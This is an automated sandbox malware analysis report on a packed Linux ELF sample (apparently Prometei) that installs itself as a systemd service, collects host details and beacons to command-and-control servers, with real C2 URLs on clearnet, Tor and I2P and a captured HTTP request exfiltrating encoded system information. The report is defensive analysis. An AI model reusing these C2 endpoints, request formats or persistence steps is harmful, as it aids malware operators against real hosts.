Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
wCzxNCXdPh

Overview

General Information

Sample Name:wCzxNCXdPh
Analysis ID:666490
MD5:e086414fe570bbb051fdd26d4e9b77c6
SHA1:99058502f3b29bc51a196e2bd9568094924fbad5
SHA256:c5f5fa85678921fe8a0bd263cd8a03f848c9e8eb88aa27b6dea7661b659ad7d3
Tags:elf
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Found Tor onion address
Drops files in suspicious directories
Sample deletes itself
Sample is packed with UPX
Sample contains only a LOAD segment without any section mappings
Writes ELF files to disk
Reads CPU information from /sys indicative of miner or evasive malware
Yara signature match
Reads system information from the proc file system
Uses the "uname" system call to query kernel version information (possible evasion)
Executes the "uname" command used to read OS and architecture name
Enumerates processes within the "proc" file system
Executes the "systemctl" command used for controlling the systemd system and service manager
Sample listens on a socket
ELF contains segments with high entropy indicating compressed/encrypted content
Sample tries to set the executable flag
HTTP GET or POST without a user agent
Executes commands using a shell command-line interpreter
Reads CPU information from /proc indicative of miner or evasive malware
Executes the "pgrep" command search for and/or send signals to processes

Classification

Joe Sandbox Version:35.0.0 Citrine
Analysis ID:666490
Start date and time: 16/07/202221:53:212022-07-16 21:53:21 +02:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 5m 26s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:wCzxNCXdPh
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Detection:MAL
Classification:mal64.evad.lin@0/5@5/0
  • VT rate limit hit for: xinchaobgccha.com
Command:/tmp/wCzxNCXdPh
PID:6224
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
Starting...
System install...OK
Standard Error:Created symlink /etc/systemd/system/multi-user.target.wants/uplugplay.service /lib/systemd/system/uplugplay.service.
  • system is lnxubuntu20
  • wCzxNCXdPh (PID: 6224, Parent: 6125, MD5: e086414fe570bbb051fdd26d4e9b77c6) Arguments: /tmp/wCzxNCXdPh
    • sh (PID: 6227, Parent: 6224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pgrep wCzxNCXdPh"
      • sh New Fork (PID: 6228, Parent: 6227)
      • pgrep (PID: 6228, Parent: 6227, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pgrep wCzxNCXdPh
    • sh (PID: 6231, Parent: 6224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pidof wCzxNCXdPh"
      • sh New Fork (PID: 6232, Parent: 6231)
      • pidof (PID: 6232, Parent: 6231, MD5: f58f67968fc50f1497f9ea9e9c22b6e8) Arguments: pidof wCzxNCXdPh
    • sh (PID: 6237, Parent: 6224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pgrep uplugplay"
      • sh New Fork (PID: 6238, Parent: 6237)
      • pgrep (PID: 6238, Parent: 6237, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pgrep uplugplay
    • sh (PID: 6241, Parent: 6224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pgrep upnpsetup"
      • sh New Fork (PID: 6242, Parent: 6241)
      • pgrep (PID: 6242, Parent: 6241, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pgrep upnpsetup
    • sh (PID: 6245, Parent: 6224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pidof upnpsetup"
      • sh New Fork (PID: 6246, Parent: 6245)
      • pidof (PID: 6246, Parent: 6245, MD5: f58f67968fc50f1497f9ea9e9c22b6e8) Arguments: pidof upnpsetup
    • sh (PID: 6247, Parent: 6224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl daemon-reload"
      • sh New Fork (PID: 6248, Parent: 6247)
      • systemctl (PID: 6248, Parent: 6247, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
    • sh (PID: 6254, Parent: 6224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable uplugplay.service"
      • sh New Fork (PID: 6268, Parent: 6254)
      • systemctl (PID: 6268, Parent: 6254, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable uplugplay.service
    • sh (PID: 6272, Parent: 6224, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl start uplugplay.service"
      • sh New Fork (PID: 6274, Parent: 6272)
      • systemctl (PID: 6274, Parent: 6272, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start uplugplay.service
  • systemd New Fork (PID: 6252, Parent: 6251)
  • snapd-env-generator (PID: 6252, Parent: 6251, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 6270, Parent: 6269)
  • snapd-env-generator (PID: 6270, Parent: 6269, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 6275, Parent: 1)
  • uplugplay (PID: 6275, Parent: 1, MD5: e086414fe570bbb051fdd26d4e9b77c6) Arguments: /usr/sbin/uplugplay
    • uplugplay New Fork (PID: 6278, Parent: 6275)
      • sh (PID: 6279, Parent: 6278, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/usr/sbin/uplugplay -Dcomsvc"
        • sh New Fork (PID: 6280, Parent: 6279)
        • uplugplay (PID: 6280, Parent: 6279, MD5: e086414fe570bbb051fdd26d4e9b77c6) Arguments: /usr/sbin/uplugplay -Dcomsvc
          • sh (PID: 6285, Parent: 6280, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /proc/cpuinfo"
            • sh New Fork (PID: 6286, Parent: 6285)
            • cat (PID: 6286, Parent: 6285, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /proc/cpuinfo
          • sh (PID: 6289, Parent: 6280, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "dmidecode --type baseboard"
            • sh New Fork (PID: 6290, Parent: 6289)
            • dmidecode (PID: 6290, Parent: 6289, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode --type baseboard
          • sh (PID: 6293, Parent: 6280, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "dmidecode --type baseboard"
            • sh New Fork (PID: 6294, Parent: 6293)
            • dmidecode (PID: 6294, Parent: 6293, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode --type baseboard
          • sh (PID: 6297, Parent: 6280, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "dmidecode --type baseboard"
            • sh New Fork (PID: 6298, Parent: 6297)
            • dmidecode (PID: 6298, Parent: 6297, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode --type baseboard
          • sh (PID: 6301, Parent: 6280, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "dmidecode --type baseboard"
            • sh New Fork (PID: 6302, Parent: 6301)
            • dmidecode (PID: 6302, Parent: 6301, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode --type baseboard
          • sh (PID: 6305, Parent: 6280, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "dmidecode --type baseboard"
            • sh New Fork (PID: 6306, Parent: 6305)
            • dmidecode (PID: 6306, Parent: 6305, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode --type baseboard
          • sh (PID: 6311, Parent: 6280, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "dmidecode --type baseboard"
            • sh New Fork (PID: 6312, Parent: 6311)
            • dmidecode (PID: 6312, Parent: 6311, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode --type baseboard
          • sh (PID: 6315, Parent: 6280, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c dmidecode
            • sh New Fork (PID: 6316, Parent: 6315)
            • dmidecode (PID: 6316, Parent: 6315, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode
          • sh (PID: 6319, Parent: 6280, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/os-release"
            • sh New Fork (PID: 6320, Parent: 6319)
            • cat (PID: 6320, Parent: 6319, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/os-release
          • sh (PID: 6323, Parent: 6280, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c uptime
            • sh New Fork (PID: 6324, Parent: 6323)
            • uptime (PID: 6324, Parent: 6323, MD5: 3ad70d8e33316ac713bf25c2ddf2fb14) Arguments: uptime
          • sh (PID: 6328, Parent: 6280, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "uname -a"
            • sh New Fork (PID: 6329, Parent: 6328)
            • uname (PID: 6329, Parent: 6328, MD5: 4ac7c634c5bec95753c480e9d421dcc2) Arguments: uname -a
  • cleanup
SourceRuleDescriptionAuthorStrings
wCzxNCXdPhSUSP_ELF_LNX_UPX_Compressed_FileDetects a suspicious ELF binary with UPX compressionFlorian Roth
  • 0x67890:$s1: PROT_EXEC|PROT_WRITE failed.
  • 0x678ff:$s2: $Id: UPX
  • 0x678b0:$s3: $Info: This file is packed with the UPX executable packer
SourceRuleDescriptionAuthorStrings
/usr/sbin/uplugplaySUSP_ELF_LNX_UPX_Compressed_FileDetects a suspicious ELF binary with UPX compressionFlorian Roth
  • 0x67890:$s1: PROT_EXEC|PROT_WRITE failed.
  • 0x678ff:$s2: $Id: UPX
  • 0x678b0:$s3: $Info: This file is packed with the UPX executable packer
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: wCzxNCXdPhVirustotal: Detection: 40%Perma Link
Source: wCzxNCXdPhReversingLabs: Detection: 61%
Source: /usr/bin/pgrep (PID: 6228)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/bin/pgrep (PID: 6238)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/bin/pgrep (PID: 6242)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/sbin/uplugplay (PID: 6280)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/bin/uptime (PID: 6324)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/bin/cat (PID: 6286)Reads CPU info from proc file: /proc/cpuinfoJump to behavior

Networking

barindex
Source: wCzxNCXdPh, 6224.1.0000000000520000.0000000001565000.rw-.sdmpString found in binary or memory: https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi
Source: wCzxNCXdPh, 6224.1.0000000000520000.0000000001565000.rw-.sdmpString found in binary or memory: Mhttp://p3.feefreepool.net/cgi-bin/prometei.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgihttp://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi/usr/sbin/uplugplay/etc/uplugplay/etc/CommIdcrashed.dump/usr/sbin//etc/msdtcmsdtc2msdtc3/etc/pcc0/etc/pcc1pbdebug
Source: /usr/sbin/uplugplay (PID: 6280)Socket: 0.0.0.0::88Jump to behavior
Source: global trafficHTTP traffic detected: GET /cgi-bin/prometei.cgi?r=22&i=57206Y026Q0ZQ3NC HTTP/1.0Host: p3.feefreepool.net
Source: global trafficHTTP traffic detected: GET /cgi-bin/prometei.cgi?add=aW5mbyB7DQp2My4wNVZfVW5peDY0QDI3Q001Qzg5VTNKMzE1OTdIVg0KZ2FsYXNzaWENCg0KMnggSW50ZWwoUikgWGVvbihSKSBTaWx2ZXIgNDIxMCBDUFUgQCAyLjIwR0h6DQoNCg0KDQoNCg0KVWJ1bnR1ICYgMjAuMDQuMiBMVFMgKEZvY2FsIEZvc3NhKSANCg0KL3Vzci9zYmluLw0KIDIxOjU0OjI2IHVwIDcgbWluLCAgMSB1c2VyLCAgbG9hZCBhdmVyYWdlOiAyLjMxLCAwLjkyLCAwLjM3DQpMaW51eCBnYWxhc3NpYSA1LjQuMC03Mi1nZW5lcmljICM4MC1VYnVudHUgU01QIE1vbiBBcHIgMTIgMTc6MzU6MDAgVVRDIDIwMjEgeDg2XzY0IHg4Nl82NCB4ODZfNjQgR05VL0xpbnV4DQp9DQo_&i=57206Y026Q0ZQ3NC&h=galassia&enckey=SnFWPItpC9Atz6On493V8kdaGFXHT/92MdWZdfpjFfy22c/OkAVObQS5nO7FGhYe9rRN8rN4ZtKM3JY5p8wb6exRL6Oec497Q2PF0E1DueuWYg4BUOp7V1UUMf/PC8Kg9FZAUaXa4xQgn7CRWVJ/tUe7OKPolf2MdPB3il0Lcnw= HTTP/1.0Host: p3.feefreepool.net
Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: wCzxNCXdPh, 6224.1.0000000000520000.0000000001565000.rw-.sdmpString found in binary or memory: http://dummy.zero/cgi-bin/prometei.cgi
Source: wCzxNCXdPh, 6224.1.0000000000520000.0000000001565000.rw-.sdmpString found in binary or memory: http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi
Source: wCzxNCXdPh, 6224.1.0000000000520000.0000000001565000.rw-.sdmpString found in binary or memory: http://p3.feefreepool.net/cgi-bin/prometei.cgi
Source: wCzxNCXdPh, 6224.1.0000000000520000.0000000001565000.rw-.sdmpString found in binary or memory: http://p3.feefreepool.net/cgi-bin/prometei.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rg
Source: wCzxNCXdPh, uplugplay.10.drString found in binary or memory: http://upx.sf.net
Source: wCzxNCXdPh, 6224.1.0000000000520000.0000000001565000.rw-.sdmpString found in binary or memory: https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi
Source: unknownDNS traffic detected: queries for: p3.feefreepool.net
Source: global trafficHTTP traffic detected: GET /cgi-bin/prometei.cgi?r=22&i=57206Y026Q0ZQ3NC HTTP/1.0Host: p3.feefreepool.net
Source: global trafficHTTP traffic detected: GET /cgi-bin/prometei.cgi?add=aW5mbyB7DQp2My4wNVZfVW5peDY0QDI3Q001Qzg5VTNKMzE1OTdIVg0KZ2FsYXNzaWENCg0KMnggSW50ZWwoUikgWGVvbihSKSBTaWx2ZXIgNDIxMCBDUFUgQCAyLjIwR0h6DQoNCg0KDQoNCg0KVWJ1bnR1ICYgMjAuMDQuMiBMVFMgKEZvY2FsIEZvc3NhKSANCg0KL3Vzci9zYmluLw0KIDIxOjU0OjI2IHVwIDcgbWluLCAgMSB1c2VyLCAgbG9hZCBhdmVyYWdlOiAyLjMxLCAwLjkyLCAwLjM3DQpMaW51eCBnYWxhc3NpYSA1LjQuMC03Mi1nZW5lcmljICM4MC1VYnVudHUgU01QIE1vbiBBcHIgMTIgMTc6MzU6MDAgVVRDIDIwMjEgeDg2XzY0IHg4Nl82NCB4ODZfNjQgR05VL0xpbnV4DQp9DQo_&i=57206Y026Q0ZQ3NC&h=galassia&enckey=SnFWPItpC9Atz6On493V8kdaGFXHT/92MdWZdfpjFfy22c/OkAVObQS5nO7FGhYe9rRN8rN4ZtKM3JY5p8wb6exRL6Oec497Q2PF0E1DueuWYg4BUOp7V1UUMf/PC8Kg9FZAUaXa4xQgn7CRWVJ/tUe7OKPolf2MdPB3il0Lcnw= HTTP/1.0Host: p3.feefreepool.net
Source: LOAD without section mappingsProgram segment: 0x400000
Source: wCzxNCXdPh, type: SAMPLEMatched rule: SUSP_ELF_LNX_UPX_Compressed_File date = 2018-12-12, author = Florian Roth, description = Detects a suspicious ELF binary with UPX compression, score = 038ff8b2fef16f8ee9d70e6c219c5f380afe1a21761791e8cbda21fa4d09fdb4, reference = Internal Research
Source: /usr/sbin/uplugplay, type: DROPPEDMatched rule: SUSP_ELF_LNX_UPX_Compressed_File date = 2018-12-12, author = Florian Roth, description = Detects a suspicious ELF binary with UPX compression, score = 038ff8b2fef16f8ee9d70e6c219c5f380afe1a21761791e8cbda21fa4d09fdb4, reference = Internal Research
Source: classification engineClassification label: mal64.evad.lin@0/5@5/0

Data Obfuscation

barindex
Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sampleString containing UPX found: $Id: UPX 3.95 Copyright (C) 1996-2018 the UPX Team. All Rights Reserved. $
Source: /tmp/wCzxNCXdPh (PID: 6224)File written: /usr/sbin/uplugplayJump to dropped file
Source: /usr/sbin/uplugplay (PID: 6280)Reads from proc file: /proc/statJump to behavior
Source: /usr/bin/cat (PID: 6286)Reads from proc file: /proc/cpuinfoJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/1582/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/1582/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/3088/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/3088/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/230/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/230/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/110/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/110/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/231/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/231/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/111/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/111/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/232/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/232/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/1579/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/1579/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/112/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/112/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/233/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/233/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/1699/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/1699/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/113/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/113/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/234/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/234/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/1335/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/1335/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/1698/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/1698/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/114/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/114/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/235/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/235/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/1334/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/1334/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/1576/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/1576/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/2302/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/2302/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/115/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/115/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/236/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/236/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/116/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/116/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/237/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/237/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/117/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/117/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/118/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/118/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/910/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/910/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/119/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/119/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/912/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/912/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/10/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/10/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/2307/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/2307/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/11/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/11/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/918/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/918/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/6241/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/6241/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/12/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/12/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/13/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/13/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/14/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/14/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/6242/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/6242/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/15/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/15/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/6245/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/6245/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/16/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/16/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/17/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/17/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/18/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/18/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/6246/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/6246/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/1594/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/1594/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/120/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/120/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/121/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/121/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/1349/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/1349/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/1/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/1/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/122/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/122/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/243/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/243/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/123/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/123/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/2/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6242)File opened: /proc/2/cmdlineJump to behavior
Source: /bin/sh (PID: 6248)Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reloadJump to behavior
Source: /bin/sh (PID: 6268)Systemctl executable: /usr/bin/systemctl -> systemctl enable uplugplay.serviceJump to behavior
Source: /bin/sh (PID: 6274)Systemctl executable: /usr/bin/systemctl -> systemctl start uplugplay.serviceJump to behavior
Source: /tmp/wCzxNCXdPh (PID: 6224)File: /usr/sbin/uplugplay (bits: -v usr: x grp: x all: r)Jump to behavior
Source: /tmp/wCzxNCXdPh (PID: 6227)Shell command executed: sh -c "pgrep wCzxNCXdPh"Jump to behavior
Source: /tmp/wCzxNCXdPh (PID: 6231)Shell command executed: sh -c "pidof wCzxNCXdPh"Jump to behavior
Source: /tmp/wCzxNCXdPh (PID: 6237)Shell command executed: sh -c "pgrep uplugplay"Jump to behavior
Source: /tmp/wCzxNCXdPh (PID: 6241)Shell command executed: sh -c "pgrep upnpsetup"Jump to behavior
Source: /tmp/wCzxNCXdPh (PID: 6245)Shell command executed: sh -c "pidof upnpsetup"Jump to behavior
Source: /tmp/wCzxNCXdPh (PID: 6247)Shell command executed: sh -c "systemctl daemon-reload"Jump to behavior
Source: /tmp/wCzxNCXdPh (PID: 6254)Shell command executed: sh -c "systemctl enable uplugplay.service"Jump to behavior
Source: /tmp/wCzxNCXdPh (PID: 6272)Shell command executed: sh -c "systemctl start uplugplay.service"Jump to behavior
Source: /usr/sbin/uplugplay (PID: 6279)Shell command executed: sh -c "/usr/sbin/uplugplay -Dcomsvc"Jump to behavior
Source: /usr/sbin/uplugplay (PID: 6285)Shell command executed: sh -c "cat /proc/cpuinfo"Jump to behavior
Source: /usr/sbin/uplugplay (PID: 6289)Shell command executed: sh -c "dmidecode --type baseboard"Jump to behavior
Source: /usr/sbin/uplugplay (PID: 6293)Shell command executed: sh -c "dmidecode --type baseboard"Jump to behavior
Source: /usr/sbin/uplugplay (PID: 6297)Shell command executed: sh -c "dmidecode --type baseboard"Jump to behavior
Source: /usr/sbin/uplugplay (PID: 6301)Shell command executed: sh -c "dmidecode --type baseboard"Jump to behavior
Source: /usr/sbin/uplugplay (PID: 6305)Shell command executed: sh -c "dmidecode --type baseboard"Jump to behavior
Source: /usr/sbin/uplugplay (PID: 6311)Shell command executed: sh -c "dmidecode --type baseboard"Jump to behavior
Source: /usr/sbin/uplugplay (PID: 6315)Shell command executed: sh -c dmidecodeJump to behavior
Source: /usr/sbin/uplugplay (PID: 6319)Shell command executed: sh -c "cat /etc/os-release"Jump to behavior
Source: /usr/sbin/uplugplay (PID: 6323)Shell command executed: sh -c uptimeJump to behavior
Source: /usr/sbin/uplugplay (PID: 6328)Shell command executed: sh -c "uname -a"Jump to behavior
Source: /bin/sh (PID: 6228)Pgrep executable: /usr/bin/pgrep -> pgrep wCzxNCXdPhJump to behavior
Source: /bin/sh (PID: 6238)Pgrep executable: /usr/bin/pgrep -> pgrep uplugplayJump to behavior
Source: /bin/sh (PID: 6242)Pgrep executable: /usr/bin/pgrep -> pgrep upnpsetupJump to behavior
